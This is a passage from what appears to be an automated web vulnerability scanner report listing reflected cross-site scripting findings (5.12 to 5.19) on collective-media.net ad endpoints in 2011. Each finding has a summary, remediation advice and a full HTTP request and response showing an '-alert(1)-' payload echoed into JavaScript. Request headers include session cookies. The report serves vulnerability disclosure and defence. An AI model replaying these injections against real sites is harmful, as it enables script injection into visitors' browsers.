GET /adj/bzo.217/L3_549031128fe5'-alert(1)-'13086d8c9b3;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:26 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:26 GMT
Content-Length: 1082

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.217/L3_549031128fe5'-alert(1)-'13086d8c9b3;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAA
...[SNIP]...

5.12. http://a.collective-media.net/adj/bzo.217/L3_5490311 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7b9a'-alert(1)-'41a1dc728ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.217/L3_5490311;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989&d7b9a'-alert(1)-'41a1dc728ee=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:11 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:11 GMT
Content-Length: 1085

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989&d7b9a'-alert(1)-'41a1dc728ee=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.13. http://a.collective-media.net/adj/bzo.217/L3_5490311 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62127'-alert(1)-'b24762db86e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.217/L3_5490311;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=130512598962127'-alert(1)-'b24762db86e HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:29:36 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:29:36 GMT
Content-Length: 1082

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
0A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=130512598962127'-alert(1)-'b24762db86e;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.14. http://a.collective-media.net/adj/cm.pub_webmd/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.pub_webmd/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c422f'-alert(1)-'497b77b4914 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.pub_webmdc422f'-alert(1)-'497b77b4914/;sz=160x600;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=175465420476&tile=175465420476&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 442
Vary: Accept-Encoding
Date: Wed, 11 May 2011 16:07:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 16:07:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.pub_webmdc422f'-alert(1)-'497b77b4914/;sz=160x600;net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.15. http://a.collective-media.net/adj/cm.pub_webmd/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.pub_webmd/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dc99'-alert(1)-'12df4a40eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.pub_webmd/;sz=160x600;ord=[timestamp]?&6dc99'-alert(1)-'12df4a40eda=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=175465420476&tile=175465420476&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Vary: Accept-Encoding
Date: Wed, 11 May 2011 16:06:56 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 16:06:56 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.pub_webmd/;sz=160x600;net=cm;ord=[timestamp]?&6dc99'-alert(1)-'12df4a40eda=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.16. http://a.collective-media.net/adj/cm.pub_webmd/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.pub_webmd/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66074'-alert(1)-'7179536e508 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.pub_webmd/;sz=160x600;ord=[timestamp]?66074'-alert(1)-'7179536e508 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=175465420476&tile=175465420476&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Vary: Accept-Encoding
Date: Wed, 11 May 2011 16:06:22 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 16:06:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.pub_webmd/;sz=160x600;net=cm;ord=[timestamp]?66074'-alert(1)-'7179536e508;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.17. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a497e'-alert(1)-'69cc317bee7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulsea497e'-alert(1)-'69cc317bee7/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;ord=681443252? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Wed, 11 May 2011 14:57:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:57:59 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulsea497e'-alert(1)-'69cc317bee7/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.18. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6e61'-alert(1)-'435ca0f1cc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911b6e61'-alert(1)-'435ca0f1cc1;srb=srb_jbl_news;sz=728x90;ord=681443252? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 470
Date: Wed, 11 May 2011 14:58:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:58:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911b6e61'-alert(1)-'435ca0f1cc1;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.19. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4d37'-alert(1)-'7d45719866d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;ord=681443252?&d4d37'-alert(1)-'7d45719866d=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 474
Date: Wed, 11 May 2011 14:57:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 14:57:41 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911;srb=srb_jbl_news;sz=728x90;net=cm;ord=681443252?&d4d37'-alert(1)-'7d45719866d=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

